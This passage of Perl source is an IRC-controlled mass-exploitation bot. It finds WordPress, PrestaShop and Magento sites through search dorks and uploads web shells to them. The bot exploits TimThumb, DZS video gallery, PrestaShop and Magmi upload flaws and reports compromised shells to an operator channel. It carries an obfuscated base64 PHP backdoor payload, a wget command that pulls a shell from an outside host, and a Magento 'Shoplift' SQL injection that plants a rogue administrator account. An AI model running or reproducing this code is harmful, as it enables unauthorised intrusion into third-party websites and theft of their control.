&ReadLogs("TIM.URL",md5_hex($cobaboku)); if($chkurl == 0){ &WriteLogs("TIM.URL",md5_hex($cobaboku)); &msg("$admin","![4TIM-Manual]! [ 12".$cobaboku." ] [ 14".$manual.".php ]"); sleep(3); &msg("$admin","![4TIM-Manual]! [ 12".$cobaboku." ] [ 14".$manual.".php ]"); } } } } elsif($caritema =~ /src=\"(.+?)\.php\?src=/i){ my $posisi = $1; if($posisi !~ /^http:\/\//i){ my $cobaboku = "http://".$site.$posisi.".php?src=".$timrid; my $buki = &Query($cobaboku); if($buki =~ /Unable to open image(.+?)\.php/i){ $manual = $1; if($manual !~ /<\/li><\/ul>/){ $manual=~s/://g; $manual=~s/^\s+|\s+$//g; $manual=~s/ /\%20/g; $posisi=~s/ /\%20/g; my $chkurl = &ReadLogs("TIM.URL",md5_hex($cobaboku)); if($chkurl == 0){ &WriteLogs("TIM.URL",md5_hex($cobaboku)); &msg("$admin","![4TIM-Manual]! [ 12".$cobaboku." ] [ 14".$manual.".php ]"); sleep(3); &msg("$channel","![4TIM-Manual]! [ Check ]"); } } } } } elsif($caritema =~ /http:\/\/(.+?)\/wp-content\/themes\/(.*?)\//i){ my $situs = $1; my $theme = $2; $tim[0] = "http://".$situs."/wp-content/themes/".$theme."/thumb.php?src=".$timrid; $tim[1] = "http://".$situs."/wp-content/themes/".$theme."/timthumb.php?src=".$timrid; $tim[2] = "http://".$situs."/wp-content/themes/".$theme."/scripts/thumb.php?src=".$timrid; $tim[3] = "http://".$situs."/wp-content/themes/".$theme."/scripts/timthumb.php?src=".$timrid; $tim[4] = "http://".$situs."/wp-content/themes/".$theme."/includes/thumb.php?src=".$timrid; $tim[5] = "http://".$situs."/wp-content/themes/".$theme."/includes/timthumb.php?src=".$timrid; $tim[6] = "http://".$situs."/wp-content/themes/".$theme."/lib/scripts/timthumb.php?src=".$timrid; $tim[7] = "http://".$situs."/wp-content/themes/".$theme."/functions/thumb.php?src=".$timrid; $tim[8] = "http://".$situs."/wp-content/themes/".$theme."/functions/timthumb.php?src=".$timrid; $tim[9] = "http://".$situs."/wp-content/themes/".$theme."/thumbopen.php?src=".$timrid; $tim[10] = "http://".$situs."/wp-content/themes/".$theme."/classes/timthumb.php?src=".$timrid; $tim[11] = "http://".$situs."/wp-content/themes/".$theme."/core/timthumb.php?src=".$timrid; $tim[12] = "http://".$situs."/wp-content/themes/".$theme."/themify/img_x.php?src=".$timrid; $tim[13] = "http://".$situs."/wp-content/themes/".$theme."/framework/timthumb.php?src=".$timrid; $tim[15] = "http://".$situs."/wp-content/themes/".$theme."/js/timthumb.php?src=".$timrid; $tim[16] = "http://".$situs."/wp-content/themes/".$theme."/_tbs.php?src=".$timrid; $tim[17] = "http://".$situs."/wp-content/plugins/".$theme."/resize.php?src=".$timrid; $tim[18] = "http://".$situs."/wp-content/plugins/".$theme."/timthumb.php?src=".$timrid; $tim[19] = "http://".$situs."/wp-content/plugins/".$theme."/js/timthumb.php?src=".$timrid; $tim[20] = "http://".$situs."/wp-content/plugins/".$theme."/scripts/timthumb.php?src=".$timrid; $tim[21] = "http://".$situs."/wp-content/plugins/".$theme."/inc/thumb.php?src=".$timrid; $tim[22] = "http://".$situs."/wp-content/plugins/".$theme."/tools/timthumb.php?src=".$timrid; $tim[23] = "http://".$situs."/wp-content/plugins/".$theme."/libs/timthumb.php?src=".$timrid; $tim[24] = "http://".$situs."/wp-content/plugins/".$theme."/includes/timthumb.php?src=".$timrid; $tim[25] = "http://".$situs."/wp-content/themes/".$theme."/lib/scripts/thumb.php?src=".$timrid; foreach my $cobabuka (@tim){ my $buka = &Query($cobabuka); if($buka =~ /Unable to open image(.*?)\/wp-content\/(.+?)\.php/i){ my $shellgua = $2; my $chkurl = &ReadLogs("TIM.URL",md5_hex($cobabuka)); if($chkurl == 0){ &WriteLogs("TIM.URL",md5_hex($cobabuka)); &msg("$channel","![13X]! memperkosa => 14".$situs." ![13*]!"); my $cobadolo = "http://".$situs."/wp-content/".$shellgua.".php"; my $cobacoba = &Query($cobadolo); if($cobacoba =~ /MODE : (.*?)<\/B>
/i){ $infune = $1; if($cobacoba =~ /Uname : (.*?)<\/B>
/i){ $unemes = $1; } $cobadolo=~s/ /\%20/g; &msg("$admin","![4TIM-Vuln]! [14 SAFE ".$infune." - ".$unemes." ] [12 ".$cobadolo."?img ] [14 ".$cobabuka." ]"); &msg("$channel","![4TIM-Vuln]! [14 SAFE ".$infune." - ".$unemes." ] [12 Check ]"); &Query($cobadolo."?bot", 1); } } sleep(3); last; } } } } exit; } } } } ################################################# sub dzs_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$dzslogo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$channel","![7$engine :7 Process :12 $$ ]! [ 2Done ]"); } if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $xmlrpc = "http://".$site."wp-content/plugins/dzs-videogallery/admin/upload/style.phtml"; my $shell2 = "http://".$site."style.php"; my $recky = "http://".$site."wp-content/plugins/dzs-videogallery/admin/upload.php"; my $cek = &get_content($recky); my $ua = LWP::UserAgent->new( keep_alive => 0,timeout => 120,agent => $uagent); my $response = $ua->post("http".$site.$bug,['file_field' => ['./style.phtml' => 'style.phtml' => 'application/octet-stream']],'Content-Type' => 'form-data'); my $hasil = $response->content; if($hasil =~ /file uploaded/) { &msg("$channel","![7$X]! [11 $site ! ]"); sleep (2); my $check = &get_content($xmlrpc."?cek"); if ($check =~ m/404 Not Found/ig) { my $safe = ""; my $os = ""; my $uid = ""; if ($check =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($check =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($check =~ /User : (.*?)<\/b>/){$uid=$1;} #&msg("$base","$dzslogo15$engine 3sHeLL10 $xmlrpc 14$safe 4$os"); &msg("$admin","![7$engine]! [ 3sHeLL10 $xmlrpc 14$safe 4$os ]"); &msg("$channel","![7$engine]! [ 3sHeLL 14$safe 4$os ]"); } my $get2 = &get_content($shell2."?cek"); sleep(1); if ($get2 =~ m/404 Not Found/ig){ my $safe = ""; my $os = ""; my $uid = ""; if ($get2 =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($get2 =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($get2 =~ /User : (.*?)<\/b>/){$uid=$1;} #&msg("$base","$dzslogo15$engine 3sHeLL10 $shell2 14$safe 4$os"); &msg("$admin","$dzslogo15$engine 3sHeLL10 $shell2 14$safe 4$os"); &msg("$channel","![7$engine]! [ 3sHeLL 14$safe 4$os ]"); #&shell_finder($chan,$site,$engine,$nick,$dzslogo); } } my @path2 = ( "/includes/xmlrpc.php", "/java.php", "/wp-content/plugins/dzs-videogallery/admin/upload/good.phtml", "/wp-content/plugins/dzs-videogallery/admin/upload/ze.phtml", "/wp-content/plugins/dzs-videogallery/admin/upload/roins.php", "/rainbow.php", "/VR46.PHP", "/xpo.php" ); my @patcher = &backdoorCheck($site,@path2); if($patcher[0] ne "false") { sleep(5); &msg("$channel","![7$engine]! [ 4Finder Success 3OK! ]"); &msg("$admin","15[4+12$engine4+15] 11$patcher[0] OS: $patcher[1] SAFEMODE:4$patcher[2] "); } } exit; } } } } sub shellx4() { my $chan = $_[0]; my $site = $_[1]; my $engine = $_[2]; my $nick = $_[3]; my $logo = $_[4]; my $crota = "http://".$site."/wp-content/plugins/dzs-videogallery/admin/upload/style.phtml"; my $crotb = "http://".$site."/style.phtml"; my $html = &get_content($crota); sleep(3); &post4("http://".$site,'system("wget http://www.soaresrama.pt/wp-includes/fonts/eaxt/info.aff -q -O ../style.phtml);'); my $html1 = &get_content($crota."?cek"); my $html2 = &get_content($crotb."?cek"); my $html = &get_content($crota."?cek"); if ($html =~ /GIF89a/) { my $safe = ""; my $os = ""; my $uid = ""; if ($html =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($html =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($html =~ /User : (.*?)<\/b>/){$uid=$1;} &msg("$channel","![7$engine]! [ 8SheLL 2Target Sent to 12$nick 9$safe $os ]"); &msg("$admin","$vdlogo 15$engine3 [Success]9 $crota 15(OS=$os) $uid "); sleep(2); } my $html2 = &get_content($crotb."?cek"); if ($html2 =~ /GIF89a/) { my $safe = ""; my $os = ""; my $uid = ""; if ($html2 =~ m/Software : (.*?)<\/u><\/b><\/a>
/) {$soft = $1;} if ($html2 =~ m/SAFE MODE is (.*?)<\/b><\/font>/) {$safe = $1;} if ($html2 =~ m/OS : (.*?)
/) {$os = $1;} &msg("$admin","15$engine9 $crotb 15(OS=$os) $uid"); sleep(2); &msg("$channel","![7$engine]! [ 4SheLL 7Target Sent to 4$nick 9$safe $os ]"); } } sub post4() { my $target = $_[0]; my $code = "R0lGODlhPD9waHANCmV2YWwoZ3ppbmZsYXRlKGJhc2U2NF9kZWNvZGUoc3RycmV2KHN0cl9yb3QxMygnPThUK3RQVE5xOE5COEhSbVVSZkxzL1FoMWVJWkRlTWVhc1hmVjZDUUx1UDVFZWxsRHZxSmJrN0x4eGZXRncwYWloKy84MUhzV3JFcERlYnM5b2p4VytyQm1NVjB0K0Z0bjIxVE9TcUxOSXZBNURQQjdnemlOZkRuSnRaRnNKWW9CUDVVMjRNRFROKytZYnFtQVEvR3pkdVBtalVPTkpBWVNWMFZrUFZlM0RTR0x6ZGI2ZFdPK2dkZmE0cVFabk5BVHBqa1pTVEQ4Y1M2MFcvSHk5a2xmeHRTUkpiRmpjWmg0L3VEaHUyanRwK3VNL1huQXhLN2RGOWE2QitPbWJNTXdtSS9lWkp0cEtTOUNDTkMrQnZhSWRnYTJramhnZGNhMC9VSGNhcmdYSlhwNG1Ea0gzT0Jsalg5ZVkrOEthcEdsSm82R0szZDZzS0JiNXpHS2gwWDNoMmRRZEhuL2tjb24xaFFkTktORy8xR0JjMzVaalhjSkNlRkJpeWdWN3BRbEtjZzhiV3RLQ2tvaFdleGU2SXk3RW0zSTRIMjQvUVIwQy95M2VuWjgxOUxwbTVXZmZYblZCU3lDL1JndVVsTml2Q1M5b04wSHJkRW5JWWxqeFJXdUM5ZmRwZG81RXMyMW9nbnNPM3Bja0wxbDRhbjErTW1CTWxjSS9YdkZqQjc1ZGY3QW02ZWdJcW85ektsd1BxSTI5MEhaSmUyMU9JNnlCU3FENzc4bi9ES3Vwbktwc0x2R3JsbEFLbVVDeEpDK0M4ZTNnZElnN0dUSG1DSThmb1NsbWppcDBHWHhFK3lMclJMbnNuVEtCbkptcnAxWGRlRlVwaE1ldXhtaEtBWXBySmNlcjcybWNkVkd5emUvMW9BMEhzQjdtck1WRWM5Rno1NnhHVDg5M2Fweit0Y1VyajM2MTNFY3I2SmIxMHBuM2g2SGFkZlpzOU1rY1lJN0tnYzFONUQ3S1RYK3B6TXBybEZJM1V3dFg3enl6SWFnckZzVEh1Q20ya3Vzcm1DY25xOFFNOGMvcnBNWm1nKzYxVWNVM2RkQUVsNjJqSW42SWNwMmFuemliK215amYwb1orQ2dVNy9VeWdSc0RpbytYQXFvMzRZQTJ2SjNlemNyNjhKY0RrYy9yd3AwVExzbzhUMm5sQTlZM2VVejNrRzE3c3haUHNsb3M1MDdpQkJEV1NqL3FVTU1YbGorRE5QbTUrdVh2V2laWHlhNUhxdDdYcGlpR09hRjV4VitwSEFjVVZwZ0hVb3czc3dyTGRsSW1LWU1zSG56djJlZGI3V2tTSDBJTTl0KzQ4alhmQnFtOTRUNFMxYVFrNTVyT3VEK1FhemNvZUJpTnNjbURTckhkRTJ4Q1VBQWNFSkVmT0VDS0puUldoZmdsMEE2dHBBSlVMVjVsY3FLMnlDVFlGSEI2Z1VaVWxxQVBKa0pMcVFPRmFvNnF6aGNZTmJPMFdha0RZMVdBUFV2dVhhRTZ2NUhDUkVDSkVXRnR4NW8zTzJMNEtod0lKZmM1ZFBITFhmMjFPcVhKQkR2cXpSL3FFRDFtbkdGaFFMaFJwWTdRV3B4UmlmQ05BSlBkTXg5U1hFYVJpSjhqVUZUUkVTWnZvYUNVbERlbG9EYXhyUkIwVm9sdE91MjNKdEVEdVdvN2ZhZXVKcjMvZ3JLZkR0WEVMcWRsa1QzOFBJOWZzeWNhcWVVTWZTdTNFRWt0VjA4bFFLL3dEanYva1B2N1BnTGFtYjh2dWZoNEZXc2tJVXpub1JLU2pBM3RKMVBsTWVNclM2ci93V1dmdHYzYkRwZzFhQUJzSGorMEkwT1lHQ0JqQ1Rnc1ZWdksxcDNTUlRiTFNOTXBERWwzdm05b1JKdmt6VUNvWmxTL1JIK2pBNnBIUmpBeGc5b2pUU01JUVM0TzBwK21LdlBUdjljM3laMG1oUDYzdHVSeVdEc0ZGOGMzUHkyZ094U2lIZXUydzRJbVE3WjIwUnhvU09NTTAvWWhxaFJKaGlXRGJHWVppdlNRQkl0czBTZTFyQXc2VEphSkU2VHhRZUlXeXZMOXZqNVZQNjM5QUR0am55ZER5dWV1WWhNd3o3UFFyRFlpWHhUb09WYmpLVHZnalFraFNhZm5POUVnNlREZVBjTmVNS2tVZEJvVUNWcEFid1BhSEMwdXBvWFpkeVRQL3BNQWVOSVBWL1lQS3ZJYzZ2LzlIYkdBR2s2YlNlUFFWWEplaDVHYllYSHF4eVZOOGJRYVFoVEFwQmt6WnlPOWdWcElIeGkyQUlxUms1V0ljTFR0UE82RHVOV28rVlVscEluUzlWdVhRWlVRNXVpTlJXZWtodVZCbFQrMlFycGZrNGhqaG84TGJHUk5OM0tJTkJiZU1GQmZrMGZtdHFUbHBhTlJnVCtjV2toRzdwYnNUMm44RktnUW5uelFxaHNqSHp6dnBGb05YUnNtc1BMRy9Wd2tGdkZxbFEwYVhrd1BvSGpkUHd2ek1jK2xicCt5VjZFSjgrUFloaGZ4VjRNbkswZmZ4ejdBNkh6NEFUM241MHhZSmhIWUJEa1pLbFVaQkNyYnpXYk9VOUNIWk1laWsxaDFIaEt6UkJISFQ5UXE1U3ZzaE51NzJxdnBoeUxWYitSNTFEU3E5SHlXL0M4cVNVWE5vSkZIazVTRTY3WUwxMHhKS2drWHRBU0tMc0pIdkZJNjExZ2dodEhwOXNESEZ4Ly8yZ0RpcGhIQlh4end5SWdWQmwxSmZiWE9Gb3JoN1RCZ1BXR1RZSk9RNzBYc3QxbDBOSnBTNndEUHVPRzB2Z0ttRVN4d0tFU0hkUmt0ckI4QVdTUG45UUpUMEQwdTBNWDJHR2s2Znk4OGJIYkVCSmpMUHh4OTdNVG5yb0d2V2VubE84Z2tQSUpSK215QnlOeHN4Zzc0dCt6Z2Y5aHRha1puUkttUmxmSTMxTUJUU3BpRDB0VllpTjQ0R3U0dS92NUpyTEtCcnhrZ2JiSkZnYi9GemRHdE95VHdiNkp4YzZrUmdVZ0ZDZ1UwUXFLTXVnMG81aStrSWhsY0xoaWtjL3VPZmdhcU43K2ZFVkF1dnp2emh1d2hFV1RTRGtGcHZGNXJNWTlpb2pjWE1FRHY3ZXV0OFViS0VjWFZ4Zmh0cWs2Q05rcGtjWEE0cG1URHNWeW5peU5XU3I0ZHo0cDV2NXZTWXQyMDgzQmlxWC9DaWdDL0o3YzNXdXRUeXdUTU42UTJWdklEVkZKU01Zay9PUGtDbDU4Z0wybTYwYjZFbVcveWVNZXpvUUZCcmZGRnR0UnFQcXdYMGdkSzFUSTNlR3llWUVsZVU4SitwR1pWME5qUFdwY3F2N2dvWFR3U2k4dDRDUjFsVkd5WjFVMHZSQWprWXRpWXRHaktVZFZ4dWlFUitTY240cnZjaFMxYWtpRUhwNURMZVY0VS81bmdoZDZUdlc2aUhidjJrUktTUTNqbEZwTDRycWw0U1N1WHcrRzZHckdUWjFSbWdiRVlQNnFaTkpDTTJoUkozTmlHM1VwenY0d09iUHBPdUJoNm55cmppUnVMREtwSFVScFVDMzBJOUVOc09vZ0xlUTNiU0w5M0wwM1FoNWo2Z2t6RjA4S0RSbW8ydjRvU09UblZ6cmJkdklidWhOS2NjN1pYRmRQRTk1a01HcmYwa2Frak5MeW5WcDBQRnhUQ1NxQkpQUEV3TkF0RDhZRW90WkdMZ1BWZGhxUVgremRsajNPMXBBWDZYYmJNZXpmM1NwVnpHNTJSUVg2MWMrQTJCMCsyQlBpVVpna2FMOHFyaVVxZU0xbnA5ZW55N0s2cEVoRkdrOVp0SytZbWRSTnZYaGFNZEZ2bXVFYlcrN3RsUWFGbU1Ga0MyVnNna0FnaHFicWdMeHVjQ1hvV2JWSTFzUmM0VVIzRXpZbUNqaXp4dCtTZkF5UjBDRWhlOHRxMzk5TVAyck4vUjl0M1Uyb1Q2aEdBMHF1VnYvRDJjZlB5dEJzdzJsaUdCcDl5amsvaWlESnVaUkdwQ1IvUEU2MEdDcUFXU0pVKzJ1aTlDdCtDYzlpYnE0b3cvbTl5TDJVaGwveFI2M3BZNWF3MW5mRzlBTUhnc1FnVmJ3bVFsY3NhYmlzMFlDc2JhT2o3UzF0M1lhNnFsYlV2QnlORXVMdktxWXRDZ1Jib1lyTWRqR1VqbWJQejQxQWZidU1GbHF0Y1dDMFZ4dGFCNnQ3WXFDckJKamIwRmxOV0pBTXc0UVdBb0NPdDFVY3dJUVNlOXpIK1JoLy9WKzVDcnR4a2R3QzhqQ2tCMjN2NGNFK0ZpWGJUQTZxQ2J3eVZPdnpIcVlJS0k5SXVIUDZSdy9NemNXVG1veWhvbmx6VXQ1MW5yNlNoNERlcUVKcWtsd0J6SFpBNkFZaVpQVHFYYk9xR0JPMmlnY3dUM0dBNGlSTGdnSWN3SW0nKSkpKSk7DQo/Pg=="; my $browser = LWP::UserAgent->new; my $res = $browser->post($target."./style.phtml",['style.phtml'=> $code => 'application/octet-stream'],'Content-type'=>'form-data'); my $hasil = $res->content; return $hasil; } sub presta_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$prestalogo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$channel","![7$engine :7 Process :12 $$ ]! [ 2Done ]"); } foreach my $bugs (@bugpresta) { (my $path = $bugs)=~ s{/[^/]+\z}{}; if ($pid = fork){ waitpid($pid ,0); } else { if (fork) { exit; } else { my $aplod = LWP::UserAgent->new; my $target = $1; my $req = $aplod->post($target.$bugs,['Filedata' => ['./style.php' => 'style.php' => 'application/octet-stream']],'Content-type' => 'multipart/form-data'); my $hasil = $req->as_string; if ($hasil =~ /success:dlc(.*)/) { &msg("$channel","![7$engine]! [ 14Exploiting ] [9 http://".$site." ]"); my $file = $1; my $shell = "http".$site.$path."/slides/dlc".$file; my $check = &get_content($shell); if ($check =~ /GIF89a/){ my ($safe,$os,$uid); if ($check =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($check =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($check =~ /User : (.*?)<\/b>/){$uid=$1;} &msg("$channel","![7$engine]! [9 shell 15SafeMod=$safe $os $uid ]"); &msg("$admin","![7$engine]! [9 $shell 15SafeMod=$safe $os $uid ]"); } else { &msg("$channel","![7$engine]! [ 4Shell Upload Failed ]"); } } } exit; } } } } } sub magmi_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $count = 0; my @list = &search_engine($chan,$bug,$dork,$engine,$mglogo); my $num = scalar(@list); if ($num > 0){ foreach my $site(@list){ $count++; if ($count == $num-1) { &msg("$channel","![7$engine :7 Process :12 $$ ]! [15 finish ]"); } my $sitex = $site; $sitex =~ s/(http\:\/\/|https\:\/\/)//i; $sitex =~ s/magmi\/.*//; $sitex =~ s/web\/.*//; $sitex =~ s/(index.php|catalog|catalogsearch|customer|sales|magmi|web)\/.*//; my $test = "http://".$site."magmi/web/magmi.php"; my $test4 = "http://".$site."index.php/admin"; my $test2 = "http://".$site."magmi/web/plugin_upload.php"; my $test3 = "http://".$site."magmi/conf/magmi.ini"; my $test4 = "http://".$site."downloader/index.php"; my $html = &get_content($test); my $xxx = &get_content($test3); my $download = &get_content($test4); if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { if ($html =~ /MAGMI/ || $html =~ m/

Upload New Plugins<\/h3>/ || $html =~ m/MAGMI (MAGento Mass Importer) by Dweeves - version 0.7.18<\/title>/i ) { &msg("$chanxxx","![7xXx]! [9 Exploit $test ]");sleep(2); &magmi_xpl($test,$chan,$site,$engine); sleep(2); &magmi2_xpl($test,$chan,$site,$engine); sleep(2); &magmi3_xpl($test,$chan,$site,$engine); sleep(2); &magmi4_xpl($test,$chan,$site,$engine); sleep(2); &magmi5_xpl($test,$chan,$site,$engine); sleep(2); &magmi6_xpl($test,$chan,$site,$engine); sleep(2); &magmi7_xpl($test,$chan,$site,$engine); sleep(2); &magmi8_xpl($test,$chan,$site,$engine); sleep(2); &magmi_sql($test,$chan,$site,$engine); sleep(2); &magmi_xpl($test2,$chan,$site,$engine); sleep(2); &magmi2_xpl($test2,$chan,$site,$engine); sleep(2); &magmi3_xpl($test2,$chan,$site,$engine); sleep(2); &magmi5_xpl($test2,$chan,$site,$engine); sleep(2); &magmi4_xpl($test2,$chan,$site,$engine); sleep(2); &magmi6_xpl($test2,$chan,$site,$engine); sleep(2); &magmi7_xpl($test2,$chan,$site,$engine); sleep(2); &magmi8_xpl($test2,$chan,$site,$engine); sleep(2); &magmi_sql($test2,$chan,$site,$engine); sleep(2); &magento_exploit($test,$chan,$site,$engine); sleep(2); &magento_exploit($test2,$chan,$site,$engine); sleep(2); }else { } if ($xxx =~ /connectivity/){ &magmiin_xpl($test3,$chan,$site,$engine); sleep(2); }else { } if ($download =~ /downloader/i && $download =~ /\<label\sfor\=\"username\"\>/i){ &download_xpl($test4,$chan,$site,$engine); sleep(3); &download2_xpl($test4,$chan,$site,$engine); sleep(3); }else { } } exit; sleep(2);} } } } sub shoplift() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$magelogo); my $num = scalar(@totexploit); if ($num > 0) { foreach my $site (@totexploit) { $count++; if ($count == $num-1) { &msg("$channel","![7,1$engine :8 Process :0 $$ ]! [15 finish ]"); } my $test = "http://".$site."index.php/admin"; my $testx = "http://".$site."app/etc/local.xml"; my $tostx = "http://".$site."api/xmlrpc"; my $tastx = "http://".$site."index.php/api/xmlrpc"; my $magmo = "http://".$site."magmi/web/download_file.php?file=../conf/magmi.ini"; my $magme = "http://".$site."magmi/web/download_file.php?file=../../app/etc/local.xml"; my $magma = "http://".$site."web/download_file.php?file=../conf/magmi.ini"; my $cmswy0 = "/Cms_Wysiwyg/directive/?forwarded=true&isIframe=true&___directive=e3tibG9jayB0eXBlPSJhZG1pbmh0bWwvcmVwb3J0X3NlYXJjaF9ncmlkIn19&filter=bnVtX3Jlc3VsdHNbZnJvbV09MCZudW1fcmVzdWx0c1tmaWVsZF9leHByXT0xPTIpO0RFTEVURSBGUk9NIGBhZG1pbl91c2VyYCBXSEVSRSB1c2VybmFtZT0nZGxjJztERUxFVEUgRlJPTSBgYWRtaW5fcm9sZWAgV0hFUkUgdXNlcl9pZD02OTY5O0lOU0VSVCBJTlRPIGBhZG1pbl91c2VyYCAoYHVzZXJfaWRgLGBmaXJzdG5hbWVgLGBsYXN0bmFtZWAsYGVtYWlsYCxgdXNlcm5hbWVgLGBwYXNzd29yZGAsYGNyZWF0ZWRgLGBtb2RpZmllZGAsYGxvZ2RhdGVgLGBsb2dudW1gLGByZWxvYWRfYWNsX2ZsYWdgLGBpc19hY3RpdmVgLGBleHRyYWApIFZBTFVFUyAoNjk2OSwnbWFnZW50bycsJ2RldmVsb3BlcicsJ2RldmVsb3BlckBtYWdlbnRvY29tbWVyY2UuY29tJywnZGxjJywnY2ExZTY1MDdhNjMyYjA5ZDUwMDJhZjZiMmZjNzc5ZWU6TVEnLCcyMDE1LTA1LTA1IDA1OjA1OjA1JywnMjAxNS0wNS0wNSAwNTowNTowNScsJzIwMTUtMDUtMDUgMDU6MDU6MDUnLDEsMCwxLCdOOycpO0lOU0VSVCBJTlRPIGBhZG1pbl9yb2xlYCAoYHBhcmVudF9pZGAsYHRyZWVfbGV2ZWxgLGBzb3J0X29yZGVyYCxgcm9sZV90eXBlYCxgdXNlcl9pZGAsYHJvbGVfbmFtZWApIFZBTFVFUyAoMSwyLDAsJ1UnLDY5NjksJ2RldmVsb3BlcicpOztERUxFVEUgRlJPTSBgbWFnZW50b19hZG1pbl91c2VyYCBXSEVSRSB1c2VybmFtZT0nZGxjJztERUxFVEUgRlJPTSBgbWFnZW50b19hZG1pbl9yb2xlYCBXSEVSRSB1c2VyX2lkPTY5Njk7SU5TRVJUIElOVE8gYG1hZ2VudG9fYWRtaW5fdXNlcmAgKGB1c2VyX2lkYCxgZmlyc3RuYW1lYCxgbGFzdG5hbWVgLGBlbWFpbGAsYHVzZXJuYW1lYCxgcGFzc3dvcmRgLGBjcmVhdGVkYCxgbW9kaWZpZWRgLGBsb2dkYXRlYCxgbG9nbnVtYCxgcmVsb2FkX2FjbF9mbGFnYCxgaXNfYWN0aXZlYCxgZXh0cmFgKSBWQUxVRVMgKDY5NjksJ21hZ2VudG8nLCdkZXZlbG9wZXInLCdkZXZlbG9wZXJAbWFnZW50b2NvbW1lcmNlLmNvbScsJ2RsYycsJ2NhMWU2NTA3YTYzMmIwOWQ1MDAyYWY2YjJmYzc3OWVlOk1RJywnMjAxNS0wNS0wNSAwNTowNTowNScsJzIwMTUtMDUtMDUgMDU6MDU6MDUnLCcyMDE1LTA1LTA1IDA1OjA1OjA1JywxLDAsMSwnTjsnKTtJTlNFUlQgSU5UTyBgbWFnZW50b19hZG1pbl9yb2xlYCAoYHBhcmVudF9pZGAsYHRyZWVfbGV2ZWxgLGBzb3J0X29yZGVyYCxgcm9sZV90eXBlYCxgdXNlcl9pZGAsYHJvbGVfbmFtZWApIFZBTFVFUyAoMSwyLDAsJ1UnLDY5NjksJ2RldmVsb3BlcicpOztERUxFVEUgRlJPTSBgbWFnZV9hZG1pbl91c2VyYCBXSEVSRSB1c2VybmFtZT0nZGxjJztERUxFVEUgRlJPTSBgbWFnZV9hZG1pbl9yb2xlYCBXSEVSRSB1c2VyX2lkPTY5Njk7SU5TRVJUIElOVE8gYG1hZ2VfYWRtaW5fdXNlcmAgKGB1c2VyX2lkYCxgZmlyc3RuYW1lYCxgbGFzdG5hbWVgLGBlbWFpbGAsYHVzZXJuYW1lYCxgcGFzc3dvcmRgLGBjcmVhdGVkYCxgbW9kaWZpZWRgLGBsb2dkYXRlYCxgbG9nbnVtYCxgcmVsb2FkX2FjbF9mbGFnYCxgaXNfYWN0aXZlYCxgZXh0cmFgKSBWQUxVRVMgKDY5NjksJ21hZ2VudG8nLCdkZXZlbG9wZXInLCdkZXZlbG9wZXJAbWFnZW50b2NvbW1lcmNlLmNvbScsJ2RsYycsJ2NhMWU2NTA3YTYzMmIwOWQ1MDAyYWY2YjJmYzc3OWVlOk1RJywnMjAxNS0wNS0wNSAwNTowNTowNScsJzIwMTUtMDUtMDUgMDU6MDU6MDUnLCcyMDE1LTA1LTA1IDA1OjA1OjA1JywxLDAsMSwnTjsnKTtJTlNFUlQgSU5UTyBgbWFnZV9hZG1pbl9yb2xlYCAoYHBhcmVudF9pZGAsYHRyZWVfbGV2ZWxgLGBzb3J0X29yZGVyYCxgcm9sZV90eXBlYCxgdXNlcl9pZGAsYHJvbGVfbmFtZWApIFZBTFVFUyAoMSwyLDAsJ1UnLDY5NjksJ2RldmVsb3BlcicpOztERUxFVEUgRlJPTSBgbWdfYWRtaW5fdXNlcmAgV0hFUkUgdXNlcm5hbWU9J2RsYyc7REVMRVRFIEZST00gYG1nX2FkbWluX3JvbGVgIFdIRVJFIHVzZXJfaWQ9Njk2OTtJTlNFUlQgSU5UTyBgbWdfYWRtaW5fdXNlcmAgKGB1c2VyX2lkYCxgZmlyc3RuYW1lYCxgbGFzdG5hbWVgLGBlbWFpbGAsYHVzZXJuYW1lYCxgcGFzc3dvcmRgLGBjcmVhdGVkYCxgbW9kaWZpZWRgLGBsb2dkYXRlYCxgbG9nbnVtYCxgcmVsb2FkX2FjbF9mbGFnYCxgaXNfYWN0aXZlYCxgZXh0cmFgKSBWQUxVRVMgKDY5NjksJ21hZ2VudG8nLCdkZXZlbG9wZXInLCdkZXZlbG9wZXJAbWFnZW50b2NvbW1lcmNlLmNvbScsJ2RsYycsJ2NhMWU2NTA3YTYzMmIwOWQ1MDAyYWY2YjJmYzc3OWVlOk1RJywnMjAxNS0wNS0wNSAwNTowNTowNScsJzIwMTUtMDUtMDUgMDU6MDU6MDUnLCcyMDE1LTA1LTA1IDA1OjA1OjA1JywxLDAsMSwnTjsnKTtJTlNFUlQgSU5UTyBgbWdfYWRtaW5fcm9sZWAgKGBwYXJlbnRfaWRgLGB0cmVlX2xldmVsYCxgc29ydF9vcmRlcmAsYHJvbGVfdHlwZWAsYHVzZXJfaWRgLGByb2xlX25hbWVgKSBWQUxVRVMgKDEsMiwwLCdVJyw2OTY5LCdkZXZlbG9wZXInKTs7IC0tIA=="; my $cmswy1 = 